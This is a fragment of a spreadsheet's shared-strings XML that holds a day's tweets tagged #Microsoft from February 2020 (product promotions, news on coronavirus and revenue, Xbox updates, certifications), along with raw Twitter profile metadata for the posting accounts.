    <t>#Windows 10 Always On #VPN IKEv2 custom cryptography settings ignored, resulting in error code 800. #Microsoft #Windows10 #Win10 #aovpn #mobility #security https://t.co/KRYr2kx9Ll</t>
  </si>
  <si>
    <t>Thu Feb 27 13:03:03 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/kZpx5jjLmR</t>
  </si>
  <si>
    <t>Thu Feb 27 13:02:04 +0000 2020</t>
  </si>
  <si>
    <t>* SPECIAL OFFER *
10% off your new LMS with integrated Office 365 digital learning content!
Empower your employees with a modern Learning Management System integrated in to Office 365.
Talk to the team and discover the potential of Office 365!
#LMS #Office365 #Microsoft #hr https://t.co/ep1oZykn3I</t>
  </si>
  <si>
    <t>Thu Feb 27 13:00:26 +0000 2020</t>
  </si>
  <si>
    <t>Go into the tennis court again and smash your way through the championships in Smash Court Tennis 3 https://t.co/syHgO3Ai3r #microsoft #xbox360 #fun #gamer #tennis https://t.co/e39t7j6ncn</t>
  </si>
  <si>
    <t>{'id': 539722403, 'id_str': '539722403', 'name': 'Ogreat Games', 'screen_name': 'OgreatGames', 'location': 'Check Us out!', 'description': 'Enjoy video game updates, cool content, &amp; everything else in this twitter feed of https://t.co/AqlVtAZvtR!', 'url': 'https://t.co/AqlVtAZvtR', 'entities': {'url': {'urls': [{'url': 'https://t.co/AqlVtAZvtR', 'expanded_url': 'https://www.ogreatgames.com', 'display_url': 'ogreatgames.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/AqlVtAZvtR', 'expanded_url': 'https://www.ogreatgames.com', 'display_url': 'ogreatgames.com', 'indices': [82, 105]}]}}, 'protected': False, 'followers_count': 13576, 'friends_count': 8695, 'listed_count': 110, 'created_at': 'Thu Mar 29 06:27:06 +0000 2012', 'favourites_count': 95, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 74834,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'http://pbs.twimg.com/profile_images/2624719093/vujahrx8ltbdjd7c3qjt_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2624719093/vujahrx8ltbdjd7c3qjt_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/539722403/1423680953',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</si>
  <si>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13:00:14 +0000 2020</t>
  </si>
  <si>
    <t>At K3 Technology, we have a highly trained service department allowing us to maintain authorizations from #Apple, #Microsoft, #VMware, #Adobe, #HewlettPackard, #SonicWall, #Lenovo, and many more. https://t.co/6omgCrW5HU</t>
  </si>
  <si>
    <t>{'id': 1149360923649310721, 'id_str': '1149360923649310721', 'name': 'K3 Technology', 'screen_name': 'k3_technology', 'location': 'Denver, CO', 'description': 'We are a leading Manage Service Provider (MSP) in Denver, Co. We provide comprehensive IT services to small, mid-sized and enterprise businesses nationwide.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 85, 'listed_count': 0, 'created_at': 'Thu Jul 11 16:52:53 +0000 2019', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 53, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1149361030310400000/Q1sjuSmA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149361030310400000/Q1sjuSmA_normal.jpg',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</si>
  <si>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13:00:11 +0000 2020</t>
  </si>
  <si>
    <t>It's the old  vs.  debate again.  Find out how #MicrosoftTeams and #SharePoint stack up against each... and how they are better together. https://t.co/q6S1xRPdFk
#microsoft #office365 #microsoft365 https://t.co/vvf2Z1X6kh</t>
  </si>
  <si>
    <t>Thu Feb 27 13:00:06 +0000 2020</t>
  </si>
  <si>
    <t>What an inspiring list of women who are transforming every aspect of the tech industry - and a special shout out to Microsoft's Peggy Johnson for her amazing leadership! via Kathleen Hogan #Microsoft https://t.co/sQTNmkqvHn</t>
  </si>
  <si>
    <t>Thu Feb 27 13:00:02 +0000 2020</t>
  </si>
  <si>
    <t>Use Azure Monitor on Azure Stack Hub https://t.co/WpYkbeEfRK - #microsoft #azurestackhub</t>
  </si>
  <si>
    <t>Thu Feb 27 12:59:59 +0000 2020</t>
  </si>
  <si>
    <t>Attention all #datascience folks! Women in Data Science, a #Stanford Initiative is orgnanizing a conference in #Noida.
Leverage this opportunity to listen to speakers from #Microsoft,#IBM,#Gartner,#Adobe
Register here https://t.co/jdNRCL90Q8
Early bird offer ends on 8th March https://t.co/XBVP2h8Fds</t>
  </si>
  <si>
    <t>{'id': 933651469252702208, 'id_str': '933651469252702208', 'name': 'KonfHub', 'screen_name': 'KonfHub', 'location': 'Bengaluru, India', 'description': 'Want to know about the upcoming tech conferences? Follow this twitter handle for updates.', 'url': 'https://t.co/YzoLZfrAhp', 'entities': {'url': {'urls': [{'url': 'https://t.co/YzoLZfrAhp', 'expanded_url': 'http://www.konfhub.com', 'display_url': 'konfhub.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1036, 'friends_count': 3498, 'listed_count': 12, 'created_at': 'Thu Nov 23 11:00:31 +0000 2017', 'favourites_count': 2134, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4640, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/989749418944487425/XVJAUhIZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/989749418944487425/XVJAUhIZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/933651469252702208/1577688789',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</si>
  <si>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12:58:49 +0000 2020</t>
  </si>
  <si>
    <t>Bob Chapek, a long-time senior exec at the company who most recently held the position of chairman of Disney Parks, Experiences and Products, will succeed him.
#Optimus #Business #Transformation #BeaGuru #DigitalTransformation #Office365 #PowerBi #Azure #Microsoft #Software</t>
  </si>
  <si>
    <t>Thu Feb 27 12:55:22 +0000 2020</t>
  </si>
  <si>
    <t>#Future is now! futureproofn #microsoft Follow us for latest Info Xbox Series X's game resume feature even works after a reboot https://t.co/XWO7Hkf22g</t>
  </si>
  <si>
    <t>Thu Feb 27 12:55:06 +0000 2020</t>
  </si>
  <si>
    <t>82% of customers want a seamless, cross channel experience with more human interaction. Use #Microsoft #Dynamics 365 for Sales to collaborate and serve customers faster.
https://t.co/XMpcfJj3bZ</t>
  </si>
  <si>
    <t>Thu Feb 27 12:50:32 +0000 2020</t>
  </si>
  <si>
    <t>Read malawton, RiscITSolutions Business Development Director's thoughts on #Microsoft Business Voice. 
Having been a direct part of MicrosoftUK Unified Comms journey over the last 15 years, Mark offers some great insights.
Click here: https://t.co/BQKfUhAPIU</t>
  </si>
  <si>
    <t>{'id': 988809399908098048, 'id_str': '988809399908098048', 'name': 'Bruce Laing', 'screen_name': 'riscitbruce', 'location': 'Llandudno, Wales', 'description': 'Geeky techy person', 'url': 'https://t.co/ZAdbgjPBir', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZAdbgjPBir', 'expanded_url': 'http://www.riscitsolutions.com', 'display_url': 'riscitsolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52, 'friends_count': 129, 'listed_count': 3, 'created_at': 'Tue Apr 24 15:58:26 +0000 2018', 'favourites_count': 191, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 796, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1051790482278367233/w6IGDEO__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1051790482278367233/w6IGDEO__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/988809399908098048/1539602269',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</si>
  <si>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12:48:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft looking to invest in Indonesian data centres #Microsoft #Indonesia https://t.co/kxz5oYCins https://t.co/j44rOBdhKd</t>
  </si>
  <si>
    <t>Thu Feb 27 12:48:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft warns it might miss revenue guidance because of #coronavirus
The software giant said revenue in the operating segment that makes its Windows OS and Surface devices is likely to be affected by the virus.
https://t.co/4hP5YcGNaf</t>
  </si>
  <si>
    <t>Thu Feb 27 12:45:14 +0000 2020</t>
  </si>
  <si>
    <t>Want to watch our first Vlog on YouTube? Everything you can imagine is real. Join us and the MSP Islamabad Crew in premiering the Games Emerge Conference 2020 on YouTube in 1hour 30mins time https://t.co/puVwNBCCNk
#MSFTStudentPartners #InspireVlogs #Microsoft #MicrosoftTeams https://t.co/zudJSqTgAA</t>
  </si>
  <si>
    <t>{'id': 1159424022591037447, 'id_str': '1159424022591037447', 'name': 'Microsoft Student Partners Inspire', 'screen_name': 'MSPInspire', 'location': '', 'description': 'Microsoft Student Partners Inspire Twitter handle', 'url': 'https://t.co/Z7EKJWV7oc', 'entities': {'url': {'urls': [{'url': 'https://t.co/Z7EKJWV7oc', 'expanded_url': 'https://studentpartners.microsoft.com', 'display_url': 'studentpartners.microsoft.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 675, 'friends_count': 50, 'listed_count': 2, 'created_at': 'Thu Aug 08 11:20:02 +0000 2019', 'favourites_count': 1140, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 765, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1162269438340562951/VRz3_xN9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1162269438340562951/VRz3_xN9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1159424022591037447/1582523027',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</si>
  <si>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12:45:05 +0000 2020</t>
  </si>
  <si>
    <t>Setting the benchmark for world-class #software and #mobility solutions. Learn about our work here: 
#OpenSource #Microsoft #AppDev 
https://t.co/cePzd0afyT https://t.co/PnRAHEXbHP</t>
  </si>
  <si>
    <t>Thu Feb 27 12:45:02 +0000 2020</t>
  </si>
  <si>
    <t>Recently, #Microsoft announced the major updates in the #Dynamics365 product line.  
These tools are designed to take advantage of the growing amount of data coming into organizations and provide an intelligent and automated solution to the company. .https://t.co/QnY72Ts0T1 #D365 https://t.co/zcG8UKxmiQ</t>
  </si>
  <si>
    <t>{'id': 131076628, 'id_str': '131076628', 'name': 'Intech Systems', 'screen_name': 'IntechSystems', 'location': 'Ahmedabad, India', 'description': 'Gold Level Microsoft Partners. Providing service in #Dynamics365,  #BusinessCentral, #PowerPlatforms #MicrosoftDynamics #Azure', 'url': 'http://t.co/77VbpqlHQV', 'entities': {'url': {'urls': [{'url': 'http://t.co/77VbpqlHQV', 'expanded_url': 'http://www.intech-systems.com', 'display_url': 'intech-systems.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 247, 'friends_count': 203, 'listed_count': 20, 'created_at': 'Fri Apr 09 05:42:11 +0000 2010', 'favourites_count': 129, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1041,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'http://pbs.twimg.com/profile_images/1100283201879080961/b0Ote3i1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1100283201879080961/b0Ote3i1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/131076628/1578113420', 'profile_link_color': '133763',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</si>
  <si>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12:39:39 +0000 2020</t>
  </si>
  <si>
    <t>Read @malawton, @RiscITSolutions Business Development Director's thoughts on #Microsoft Business Voice. 
Having been a direct part of @MicrosoftUK Unified Comms journey over the last 15 years, Mark offers some great insights.
Click here: https://t.co/xynoFFvlCR</t>
  </si>
  <si>
    <t>{'id': 386602233, 'id_str': '386602233', 'name': 'Risc IT Solutions', 'screen_name': 'RiscITSolutions', 'location': 'Llandudno', 'description': 'Backup &amp; DR | Productivity | Security | Infrastructure | #Office365 | #Azure | #Microsoft Gold Partner', 'url': 'https://t.co/ZAdbgjPBir', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZAdbgjPBir', 'expanded_url': 'http://www.riscitsolutions.com', 'display_url': 'riscitsolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2231, 'friends_count': 2918, 'listed_count': 105, 'created_at': 'Fri Oct 07 15:25:45 +0000 2011', 'favourites_count': 2649, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2449,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'http://pbs.twimg.com/profile_images/1233355438856581122/lUQEogIV_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233355438856581122/lUQEogIV_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/386602233/1527238641',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</si>
  <si>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12:39:24 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft update Q3 FY20 guidance.
https://t.co/gFbUfuirnw</t>
  </si>
  <si>
    <t>{'id': 410084797, 'id_str': '410084797', 'name': 'INOSOFT AG', 'screen_name': 'inosoftag', 'location': 'Marburg, Hessen', 'description': 'Software Development. IT Consulting. Innovation. Expert knowledge for #SharePoint #Industry40 #AugmentedReality. Made in Germany.', 'url': 'https://t.co/cIR4sHuMEf', 'entities': {'url': {'urls': [{'url': 'https://t.co/cIR4sHuMEf', 'expanded_url': 'http://www.INOSOFT.de', 'display_url': 'INOSOFT.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4046, 'friends_count': 3622, 'listed_count': 82, 'created_at': 'Fri Nov 11 16:28:50 +0000 2011', 'favourites_count': 1226, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2499, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '929A9E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1185140414703132672/lpNOfyfW_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1185140414703132672/lpNOfyfW_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/410084797/1571313605', 'profile_link_color': '008A97',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</si>
  <si>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12:38:30 +0000 2020</t>
  </si>
  <si>
    <t>#COVID-19 #virus reduces #Microsofts #revenues for coming quarter via @dataeconomy https://t.co/Z0pu4ffpBO</t>
  </si>
  <si>
    <t>{'id': 316693837, 'id_str': '316693837', 'name': 'Antony Savvas', 'screen_name': 'AntonySavvas', 'location': 'York, North Yorkshire', 'description': 'IT always needs looking at and I do it as an IT journalist, travelling across Europe and the US to do it.', 'url': 'http://t.co/9Tpo8HGFXr', 'entities': {'url': {'urls': [{'url': 'http://t.co/9Tpo8HGFXr', 'expanded_url': 'http://www.journalistdirectory.com/journalist/z/Antony-Savvas', 'display_url': 'journalistdirectory.com/journalist/z/Aâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1992, 'friends_count': 1209, 'listed_count': 306, 'created_at': 'Mon Jun 13 20:41:18 +0000 2011', 'favourites_count': 249, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9825,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'http://pbs.twimg.com/profile_images/378800000374135858/1b21d17f3c8c11ce1fe81f077e56a9b6_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000374135858/1b21d17f3c8c11ce1fe81f077e56a9b6_normal.jpeg',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</si>
  <si>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12:34:43 +0000 2020</t>
  </si>
  <si>
    <t>COVID-19 virus reduces Microsoft's revenues for coming quarter | #DataEconomy https://t.co/1KKBtz7y2N #Microsoft #coronavirus</t>
  </si>
  <si>
    <t>Thu Feb 27 12:32:18 +0000 2020</t>
  </si>
  <si>
    <t>Were very excited to show off 12 of our colleagues (and counting) who have completed the Microsoft Service Adoption Certification!!
-
-
#certification #celebration #serviceadoption #certified #qualifications #techconsultant #techconsultancy #microsoft #jersey #jerseyci #tech https://t.co/DaYAWoKCHi</t>
  </si>
  <si>
    <t>{'id': 282610107, 'id_str': '282610107', 'name': 'Prosperity 24/7', 'screen_name': 'P247', 'location': 'Jersey, Channel Islands', 'description': 'Committed to the provision of business consultancy and strategic technology guidance. Devoted to our community #ProsperityDay', 'url': 'https://t.co/RnnBQMO3UX', 'entities': {'url': {'urls': [{'url': 'https://t.co/RnnBQMO3UX', 'expanded_url': 'http://www.prosperity247.com', 'display_url': 'prosperity247.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 784, 'friends_count': 544, 'listed_count': 48, 'created_at': 'Fri Apr 15 14:59:52 +0000 2011', 'favourites_count': 1875, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1963,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'http://pbs.twimg.com/profile_images/1003925808296099840/Z-52fJfv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1003925808296099840/Z-52fJfv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/282610107/1528121781', 'profile_link_color': 'E81C4F',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</si>
  <si>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12:31:15 +0000 2020</t>
  </si>
  <si>
    <t>Technology can save more lives, alleviate suffering and restore human dignity by changing the way frontline relief organizations anticipate, predict and better target response efforts. Subscribe to learn more about what #Microsoft can do for you! https://t.co/QubJgrizAl</t>
  </si>
  <si>
    <t>Thu Feb 27 12:30:40 +0000 2020</t>
  </si>
  <si>
    <t>Michiel showing off his well deserved Azure Fundamentals certificate! Congratulations! 
#certified #microsoft #azurefundamentals #xploregroup https://t.co/JPNflyxvGt</t>
  </si>
  <si>
    <t>{'id': 186419648, 'id_str': '186419648', 'name': 'Fenego', 'screen_name': 'fenegonv', 'location': 'Hasselt, Belgium', 'description': 'Passion for technology, experts in commerce. Powerful commerce solutions. Proud Intershop partner.', 'url': 'http://t.co/SnG2fdlf1h', 'entities': {'url': {'urls': [{'url': 'http://t.co/SnG2fdlf1h', 'expanded_url': 'http://www.fenego.be', 'display_url': 'fenego.be', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 316, 'friends_count': 224, 'listed_count': 18, 'created_at': 'Fri Sep 03 12:21:33 +0000 2010', 'favourites_count': 97, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 443,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'http://pbs.twimg.com/profile_images/1179002461249515520/VEnE4wkt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1179002461249515520/VEnE4wkt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/186419648/1573766030', 'profile_link_color': '668AD8', 'profile_sidebar_border_color': '6B6B6B', 'profile_sidebar_fill_color': 'F4F5FE', 'profile_text_color': '6B6B6B', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 12:30:25 +0000 2020</t>
  </si>
  <si>
    <t>Office 365 Business? Business Premium? E3 or E5? Which #Office365 package is right for my law firm? @bschorr #microsoft  https://t.co/OEaUYBTTwC https://t.co/8t9OnZNAY8</t>
  </si>
  <si>
    <t>Thu Feb 27 12:30:03 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 trick unlocks secret surfing game hidden inside your web browser https://t.co/74ha8QlDJh via @GeekTech_App #geektech #technewsapp  #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 12:30:00 +0000 2020</t>
  </si>
  <si>
    <t>#Thursday Microsoft is bringing its antivirus software to iOS and Android
#Microsoft #antivirus #iOS #Android #software #apps #technews #techpout #techupdates #technology #techfacts #tech4all #TechForGood #techworld #techno #techtips #technologies 
https://t.co/Vr6oVTu7rK</t>
  </si>
  <si>
    <t>{'id': 1144146832311799808, 'id_str': '1144146832311799808', 'name': 'TechPout', 'screen_name': 'PoutTech', 'location': 'Jaipur, India', 'description': 'TechPout - One-Stop #technopedia for daily mishmash of stories and insights in the #digital world of #technology. Check out our website for more.', 'url': 'https://t.co/6dUEigYE3i', 'entities': {'url': {'urls': [{'url': 'https://t.co/6dUEigYE3i', 'expanded_url': 'http://techpout.com', 'display_url': 'techpout.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 258, 'friends_count': 446, 'listed_count': 4, 'created_at': 'Thu Jun 27 07:33:56 +0000 2019', 'favourites_count': 371, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 299, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1151016190841462784/5kawiDre_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151016190841462784/5kawiDre_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1144146832311799808/1563339263',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</si>
  <si>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12:28:22 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Series X's game resume feature even works after a reboot https://t.co/tIM6xKtT0g #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 12:26:08 +0000 2020</t>
  </si>
  <si>
    <t>MICROSOFT OFFICE PROFESSIONAL PLUS 2019 License Key Fast Delivery 32/64bit #2019 #32/64BIT #Delivery #FAST #License #Microsoft #office #Plus #professional https://t.co/ntiUjNRlLy</t>
  </si>
  <si>
    <t>Thu Feb 27 12:26:02 +0000 2020</t>
  </si>
  <si>
    <t>ProBeat: AI is helping Microsoft rethink Office for mobile https://t.co/p6l3avq5eE #ai #microsoft #microsoftoffice #mobile #userexperience https://t.co/kL7PfPVvUl</t>
  </si>
  <si>
    <t>{'id': 291785111, 'id_str': '291785111', 'name': 'CreativeConstruction', 'screen_name': 'CreativeConstr', 'location': 'Berlin, Germany', 'description': 'Wir helfen Organisationen dabei, digitale Potenziale\nsystematisch zu erschlieÃŸen und zu entwickeln https://t.co/WkfElowkOK', 'url': 'http://t.co/HbCO9nplgu', 'entities': {'url': {'urls': [{'url': 'http://t.co/HbCO9nplgu', 'expanded_url': 'http://www.creativeconstruction.de', 'display_url': 'creativeconstruction.de', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/WkfElowkOK', 'expanded_url': 'http://www.creativeconstruction.de/impressum/', 'display_url': 'creativeconstruction.de/impressum/', 'indices': [99, 122]}]}}, 'protected': False, 'followers_count': 1326, 'friends_count': 1031, 'listed_count': 977, 'created_at': 'Mon May 02 16:19:33 +0000 2011', 'favourites_count': 146, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10735,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'http://pbs.twimg.com/profile_images/1409701968/CC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1409701968/CC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/291785111/1460041610',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</si>
  <si>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12:25:25 +0000 2020</t>
  </si>
  <si>
    <t>App Update: #Facebook #Messenger und #Messenger (Beta)
 https://t.co/Cft9fCquOo
#Microsoft #Windows10</t>
  </si>
  <si>
    <t>{'id': 862017979525083138, 'id_str': '862017979525083138', 'name': 'Windows Love', 'screen_name': 'WindowsLove_de', 'location': 'Deutschland', 'description': 'Einer der individuellsten Windows Blogs aus Deutschland. Wir bringen dir tÃ¤glich News aus der Windows Welt. ðŸ±ðŸ“', 'url': 'https://t.co/GIsLwG0rCz', 'entities': {'url': {'urls': [{'url': 'https://t.co/GIsLwG0rCz', 'expanded_url': 'https://windows-love.de/', 'display_url': 'windows-love.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 196, 'friends_count': 79, 'listed_count': 5, 'created_at': 'Tue May 09 18:54:36 +0000 2017', 'favourites_count': 243, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2694,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'http://pbs.twimg.com/profile_images/1109888920517525505/AaBicnzQ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1109888920517525505/AaBicnzQ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/862017979525083138/1562777852', 'profile_link_color': '00A1F1',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</si>
  <si>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12:24:39 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft (MSFT) Stock Down 2% as Company Warns Coronavirus May Impact Q3 Earnings
https://t.co/g28wPKtXGo
#Microsoft #MSFT #Coronavirus https://t.co/Ibg6GjZyLr</t>
  </si>
  <si>
    <t>Thu Feb 27 12:23:56 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Azure Service Bus is a fully managed enterprise integration message broker. Service Bus can decouple applications and services and offers a reliable and secure platform for asynchronous transfer of data and state.
#microsoft #azure #quibiq
https://t.co/zSyOm7C52s</t>
  </si>
  <si>
    <t>{'id': 3598061117, 'id_str': '3598061117', 'name': 'QUIBIQ GmbH', 'screen_name': 'quibiq_de', 'location': 'Stuttgart, Baden-WÃ¼rttemberg', 'description': 'Twittern Ã¼ber #IntegrationslÃ¶sungen, #Microsofttechnologien, #Support, #Service, #Schulung, #Coaching, #BizTalkServer seit 2000 erfolgreich am Markt', 'url': 'http://t.co/kwvQGuUeLx', 'entities': {'url': {'urls': [{'url': 'http://t.co/kwvQGuUeLx', 'expanded_url': 'http://www.quibiq.de/unternehmen/', 'display_url': 'quibiq.de/unternehmen/', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 75, 'friends_count': 418, 'listed_count': 9, 'created_at': 'Wed Sep 09 11:53:24 +0000 2015', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 745,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'http://pbs.twimg.com/profile_images/652122691806330880/Uz8FopGw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/652122691806330880/Uz8FopGw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3598061117/1444313622',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</si>
  <si>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12:19:25 +0000 2020</t>
  </si>
  <si>
    <t>Ex-Microsoft Engineer Used Bitcoin to Help Embezzle Millions From Tech Giant- https://t.co/LrH5aJr2Wj #Bitcoin #Microsoft</t>
  </si>
  <si>
    <t>{'id': 2841538270, 'id_str': '2841538270', 'name': 'Laura Anthony, Esq.', 'screen_name': 'LauraAnthonyEsq', 'location': 'West Palm Beach, FL', 'description': 'Laura Anthony, Esq., Founding Partner of Anthony L.G., PLLC. A Corporate Law Firm.', 'url': 'https://t.co/C8QLqNOzyP', 'entities': {'url': {'urls': [{'url': 'https://t.co/C8QLqNOzyP', 'expanded_url': 'http://www.AnthonyPLLC.com/', 'display_url': 'AnthonyPLLC.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 931, 'friends_count': 888, 'listed_count': 11, 'created_at': 'Wed Oct 22 20:35:36 +0000 2014', 'favourites_count': 395, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5348,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'http://pbs.twimg.com/profile_images/896106690734694400/_z7-WnGp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/896106690734694400/_z7-WnGp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2841538270/1541277925',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</si>
  <si>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12:19:00 +0000 2020</t>
  </si>
  <si>
    <t>Next week in Cairo: #HPE #Microsoft #HybridCloud Summit with #ZeroDownSoftware as sponsor : join industry experts to accelerate your #HybridCloud Strategy. Register at https://t.co/1bb3XxSYup 
#AzureStackHub #AzureStackHCI @HPE_HybridCloud #HPEMSFT #MSDev2020 @MicrosoftEgypt https://t.co/EFZeWDc28B</t>
  </si>
  <si>
    <t>Thu Feb 27 12:15:40 +0000 2020</t>
  </si>
  <si>
    <t>Top Big 3 cloud infrastructure are #Amazon, #Microsoft #Google Can anyone point out the 4th one?</t>
  </si>
  <si>
    <t>{'id': 75206515, 'id_str': '75206515', 'name': 'Dilip Kumar', 'screen_name': 'followdilip', 'location': 'India', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 113, 'friends_count': 281, 'listed_count': 1, 'created_at': 'Fri Sep 18 05:15:13 +0000 2009', 'favourites_count': 78, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 147,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'http://pbs.twimg.com/profile_images/1187370835578937345/EyYXvzL6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187370835578937345/EyYXvzL6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/75206515/1507294011',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</si>
  <si>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12:15:09 +0000 2020</t>
  </si>
  <si>
    <t>Up to 12 TFLOPs of GPU power from the Xbox Series X.
https://t.co/AVoJnOkMqT
#Microsoft #Xbox #Console #AMD #Ryzen #Radeon #GPU #CPU #RDNA #Zen #Gaming #news #technews https://t.co/DIBUvXPsOF</t>
